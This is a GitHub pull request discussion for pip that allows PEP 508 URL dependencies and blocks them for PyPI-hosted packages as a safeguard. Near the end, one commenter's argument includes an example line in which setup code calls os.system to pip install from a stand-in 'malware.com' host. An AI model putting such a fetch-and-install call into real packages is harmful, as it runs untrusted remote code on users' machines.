Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Allow PEP508 url dependencies in install_requires #5571

Merged
merged 1 commit into from
Jul 23, 2018

Conversation

bstrdsmkr
Copy link
Contributor

@bstrdsmkr bstrdsmkr commented Jul 5, 2018

This is intended to be the minimum obvious approach to allow users to make user of PEP508 urls as dependencies. Per the discussion in #4187, packages originating from PyPI (by virtue of being hosted at files.pythonhosted.org) are explicitly excluded from this feature in an effort to provide some security and avoid the (possibly) unexpected side effect of pip install grabbing packages from arbitrary 3rd party urls. Once PyPI is able to block such packages themselves, this patch will be obviated and should be removed.

Adding a property to the PyPI Index instance feels dirty, especially since it is only ever used once, but I decided on adding it there instead of hard coding it in the conditional logic. My reasoning is that if/when PyPI changes their hosting url, it'll need to be updated and the point of instance creation seemed the most logical location for someone to look when that time comes around.

Fixes #4187

Copy link
Member

@pradyunsg pradyunsg left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the PR @bstrdsmkr!

I'm assuming that you opened a PR for CI and feedback so, hopefully you don't mind that. :)

PS: I'm super nit-picky. :P


# This is a temporary hack used to block installs of PyPI packages which depend
# on external urls only necessary until PyPI can block such packages themselves
PyPI.link_source = 'files.pythonhosted.org'
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

mypy won't be super happy about this.

@@ -0,0 +1,5 @@
Allow PEP508 dependencies in install_requires.
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

suggestion: Allow PEP 508 URL requirements to be used as dependencies.

@pytest.mark.network
def test_install_from_pypi_with_ext_url_in_install_requires_is_blocked(script):
res = script.pip('install', '-vvv', 'pep-508-url-deps', expect_error=True)
assert "Packages installed from PyPI cannot " in res.stderr, str(res)
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

nit: Instead of checking the entire message over multiple statements, I'd rather that you compose an expected string and then just do assert expected in result.stderr.

We should also check the exit code here.

)

if req.url and comes_from.link.netloc == PyPI.link_source:
# Explicitly blacklist pypi packages that depend on external urls
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This indentation seems weird.

Could you make both the comment and the statement the same indent, which is a multiple of 4?

@pradyunsg pradyunsg added type: enhancement Improvements to functionality PEP implementation Involves some PEP labels Jul 5, 2018
@bstrdsmkr
Copy link
Contributor Author

@pradyunsg thanks for the feedback! I've incorporated your changes. If you think the approach is solid, I'll remove the wip and mark is as closing #4187

Copy link
Member

@pradyunsg pradyunsg left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm fine with the approach here.

@@ -2,14 +2,19 @@


class Index(object):
def __init__(self, url):
def __init__(self, url, link_source=''):
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You can drop the default on this.

Making it mandatory to pass doesn't affect anything and prevents from accidentally missing it out. :)

# This part of a temporary hack used to block installs of PyPI packages
# which depend on external urls only necessary until PyPI can block
# such packages themselves
self.link_source = link_source
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Call this something else? link_source seems very ambiguous and is completely out of context in this file.

Possibly file_storage_domain?

"dependencies" % req
"Packages installed from PyPI cannot depend on packages "
"which are not also hosted on PyPI. "
"%s depends on %s " % (comes_from, req)
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This message shows up as:

Packages installed from PyPI cannot depend on packages which are not also hosted on PyPI. pep-508-url-deps from https://files.pythonhosted.org/packages/bc/69/b088a665f2cf87cb1f260376dce6895bf4b00336736b2082ef5af5a8bd20/pep-508-url-deps-1.0.0.post0.tar.gz#sha256=0fdbbb60d734d738d1bd25eeddfb4bc89f1c3cc5406f59c32b7eb4445439f1b6 depends on sampleproject@ https://github.com/pypa/sampleproject/archive/master.zip

I don't think that's very friendly or clear. It's rather have something like:

PEP 508 URL requirements are forbidden when installing from PyPI.
  pep-508-url-deps depends on sampleproject@https://github.com/pypa/sampleproject/archive/master.zip

@@ -0,0 +1,5 @@
Allow PEP 508 URL requirements to be used as dependencies.

As a security measure, all packages installed from PyPI are specifically blacklisted
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Minor preference to not say "blacklisted" here. I'd rather just say:

As a security measure, this is not supported when installing from PyPI for dependencies not hosted on PyPI. In the future, PyPI will block uploading packages with such external URL dependencies directly.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm trying to point attention to the fact that this is a conscious choice to make it not work for a specific reason, rather than just unsupported which felt more to me like "may or may not work."

Does that make sense?

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Indeed. My reservation here is that this says "blacklist" here (and in the comment) but we don't actually have a "list" of packages that we disallow based on -- it's on a characteristic of how the installation is being done.

So, a phrasing that doesn't use "blacklist" is something I'd prefer but I won't block this PR for this. :P

@pradyunsg
Copy link
Member

It just occurred to me that we would also want to block pip from doing this on test.pypi.org (the domain is test-file.pythonhosted.org).

@bstrdsmkr bstrdsmkr changed the title [WIP][#4187] Allow PEP508 url dependencies in install_requires [#4187] Allow PEP508 url dependencies in install_requires Jul 6, 2018
@bstrdsmkr
Copy link
Contributor Author

@pradyunsg changes integrated

@pradyunsg pradyunsg changed the title [#4187] Allow PEP508 url dependencies in install_requires Allow PEP508 url dependencies in install_requires Jul 6, 2018
PyPI = Index('https://pypi.org/')
PyPI = Index(
'https://pypi.org/',
['files.pythonhosted.org', 'test-file.pythonhosted.org'],
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.


@pytest.mark.network
def test_install_from_pypi_with_ext_url_in_install_requires_is_blocked(script):
res = script.pip('install', '-vvv', 'pep-508-url-deps', expect_error=True)

This comment was marked as resolved.

@bstrdsmkr
Copy link
Contributor Author

@pradyunsg once more, with feeling! :)

Copy link
Member

@pradyunsg pradyunsg left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I just realized I'm suggesting a lot of small changes. Thanks for constantly updating the PR. :)



@pytest.mark.network
def test_install_from_test_pypi_with_ext_url_dependency_is_blocked(script):
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The test can simply be parameterized.

PyPI = Index('https://pypi.org/')
PyPI = Index(
'https://pypi.org/',
['files.pythonhosted.org', 'test-files.pythonhosted.org'],
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can we instead have a TestPyPI = Index(...), and use that in the checks?

@bstrdsmkr
Copy link
Contributor Author

@pradyunsg no worries, might as well get it right the first time =)

I've addressed your changes, but the tests are going to fail since we're also now testing against test.pypi.org, which doesn't have peppercorn which sampleproject depends on, which is wanted by pep-508-urls =)

@pradyunsg pradyunsg added this to the 18.0 milestone Jul 10, 2018
Copy link
Member

@pradyunsg pradyunsg left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I've addressed your changes, but the tests are going to fail since we're also now testing against test.pypi.org, which doesn't have peppercorn which sampleproject depends on, which is wanted by pep-508-urls =)

LOL. Nice way for the test to fail.

I don't think we need to change anything that on pep-508-urls, since pip shouldn't be trying to download sampleproject in the first place.

@@ -169,11 +170,15 @@ def from_req(cls, req, comes_from=None, isolated=False, wheel_cache=None):
req = Requirement(req)
except InvalidRequirement:
raise InstallationError("Invalid requirement: '%s'" % req)
if req.url:

if req.url and comes_from.link.netloc == PyPI.file_storage_domain:
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This should also check for TestPyPI though.

Suggestion (you can use a different way if you like):

domains_not_allowed = [PyPI..., TestPyPI...]
comes_from_domain = comes_from...
if req.url and comes_from_domain in domains_not_allowed:
    ...

"pep-508-url-deps depends on sampleproject@ "
"https://github.com/pypa/sampleproject/archive/master.zip"
)
assert error_message in res.stderr, str(res)
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think it would be a good idea to check the error code before checking the message.

@bstrdsmkr
Copy link
Contributor Author

@pradyunsg ready for review again

@bstrdsmkr
Copy link
Contributor Author

@pradyunsg any more feedback? =)

@pradyunsg
Copy link
Member

Thanks @bstrdsmkr! LGTM.

@pypa/pip-committers Does anyone else want to review this, or want additional changes here?

@pfmoore
Copy link
Member

pfmoore commented Jul 13, 2018

I don't have time to do a full review, but I quickly skimmed the code and it looks OK to me. Thanks @bstrdsmkr for picking up this change for us!

@pradyunsg
Copy link
Member

Pushing this down the road to the next release since I don't think this'd happen in time for 18.0.

This doesn't seem to be a release blocker -- it's new functionality that can be merged post 18.0.

@pfmoore
Copy link
Member

pfmoore commented Jul 21, 2018

@pradyunsg We've had a couple of approvals, plus my OK. Why not just merge this? Nothing's going to happen between now and when we do merge, so I don't see much value in being cautious here. I'm OK to merge this unless you have a specific objection.

@pfmoore
Copy link
Member

pfmoore commented Jul 21, 2018

Apologies, I see from #5516 (comment) that the 18.0 release is this weekend, so that's a perfectly good reason for deferring!

I'll merge this after the release.

@bstrdsmkr
Copy link
Contributor Author

I'm not seeing the reason this was pushed. It's holding up things at work for me so I can fix things today if there's any way to get this in the next release

@pradyunsg
Copy link
Member

I'm not seeing the reason this was pushed.

I'd prefer to be a little cautious here and not merge this PR right now. I understand that this change might be holding up some improvement/cleanup work for you (and other users) and I'd personally like to see this change made too. I do feel being a little cautious here doesn't hurt that much.

Further, while I do think this PR is ready to merge, I think these changes should be released with some changes to --process-dependency-links (like clearly providing a timeline for it's removal, suggesting users to move over to PEP 508 URL deps when they use it etc) and there's possibly some discussion that needs to happen there. It's definitely too late for that discussion to complete in time for 18.0, which is going to be released today/tomorrow.

@pfmoore
Copy link
Member

pfmoore commented Jul 22, 2018

Sounds reasonable to me

@bstrdsmkr
Copy link
Contributor Author

I can understand that, I just wish I had known that upfront and I wouldn't have put so much effort into trying to get it ready so fast.

Either way, thanks for your help in getting it this far. Any estimate on when it will be released? Ballpark obviously, I just have to give a report on the delay

@dstufft
Copy link
Member

dstufft commented Jul 22, 2018

With pip 18, we've now switched to a regular release cadence, which you can find the full details at https://pip.pypa.io/en/stable/development/#release-cadence, but the tl;dr is the next release will be October, so if everything is ready and merged before October, it'll go out then.

@pradyunsg
Copy link
Member

I can understand that, I just wish I had known that upfront and I wouldn't have put so much effort into trying to get it ready so fast.

Indeed. I agree that this could have been communicated earlier; apologies for that.

Will take care of this in the future. :)

@pfmoore
Copy link
Member

pfmoore commented Jul 23, 2018

I think this can go in now. The --process-dependency-links changes depend on this being in, not the other way around.

@pradyunsg pradyunsg merged commit 531be4f into pypa:master Jul 23, 2018
@AdamLeyshon
Copy link

AdamLeyshon commented Aug 6, 2018

So dependencies with install_requires sub-dependencies in private Git repos are broken until October?

MyGitPackage A -> Depends on -> MyGitPackage B

Both A and B are from our private Git repo, But B cannot be installed because:

Error: Direct url requirement (like mygitpackageB@YourPrivateRepo) are not allowed for dependencies

when using setup.py in Package A

install_requires = [
    mygitpackageB@git+ssh://git@somegitserver/mygitpackageB@master#egg=mygitpackageB=99.0.0
]

And there is no way to override this check.

Is there a pre-release version available?

We will have several hundred packages that depend on other packages in the same repo.
(Major code isolation/separation project)

@bstrdsmkr
Copy link
Contributor Author

@AdamLeyshon somewhat ironically, it seems like pip install git+https://github.com/pypa/pip@master#egg=pip should work?

@pradyunsg
Copy link
Member

That has been the case since pip 10, which is when this functionality was introduced.

While the blocking seems arbitrary, the intent is to allow the user to not be able to install packages from PyPI that reach out to random locations on the internet. This PR makes it a much more specific, allowing the use of URL dependencies in a package's install_requires when installing from anywhere except PyPI, enabling use cases such as yours.

None the less, yes, the next release is in October. This functionality would be released then, barring any blockers.

@jbarlow83
Copy link

It seems to me it would be trivial to create a PyPI compliant package that downloads and executes code from elsewhere, so the precautions being taken here are unnecessary.

For example if setup.py or the package at runtime calls os.system("pip install git://malware.com/..."), possibly with some obfuscation and introspection of its caller, restricting to PyPI isn't going to protect anyone, but it is going to inconvenience a lot of people.

PyPI.file_storage_domain,
TestPyPI.file_storage_domain,
]
if req.url and comes_from.link.netloc in domains_not_allowed:

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If comes_from.link is None, this crashes. This can happen if a package is already installed, and it was installed from a local wheel. I tested this on Pip 18.1 released today, but can't figure out how to make a minimum example.

Exception:
Traceback (most recent call last):
  File "<local>/venv/lib/python3.7/site-packages/pip/_internal/cli/base_command.py", line 143, in main
    status = self.run(options, args)
  File "<local>/venv/lib/python3.7/site-packages/pip/_internal/commands/install.py", line 318, in run
    resolver.resolve(requirement_set)
  File "<local>/venv/lib/python3.7/site-packages/pip/_internal/resolve.py", line 102, in resolve
    self._resolve_one(requirement_set, req)
  File "<local>/venv/lib/python3.7/site-packages/pip/_internal/resolve.py", line 318, in _resolve_one
    add_req(subreq, extras_requested=available_requested)
  File "<local>/venv/lib/python3.7/site-packages/pip/_internal/resolve.py", line 275, in add_req
    wheel_cache=self.wheel_cache,
  File "<local>/venv/lib/python3.7/site-packages/pip/_internal/req/constructors.py", line 288, in install_req_from_req
    if req.url and comes_from.link.netloc in domains_not_allowed:
AttributeError: 'NoneType' object has no attribute 'netloc'

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@wkschwartz : can you check with #5788?

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think this line can simply be changed to

if req.url and comes_from.link is not None and comes_from.link.netloc in domains_not_allowed:

@lock
Copy link

lock bot commented May 31, 2019

This thread has been automatically locked since there has not been any recent activity after it was closed. Please open a new issue for related bugs.

@lock lock bot added the auto-locked Outdated issues that have been locked by automation label May 31, 2019
@lock lock bot locked as resolved and limited conversation to collaborators May 31, 2019
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
auto-locked Outdated issues that have been locked by automation PEP implementation Involves some PEP type: enhancement Improvements to functionality
Projects
None yet
Development

Successfully merging this pull request may close these issues.

Un-deprecate --process-dependency-links until an alternative is implemented
10 participants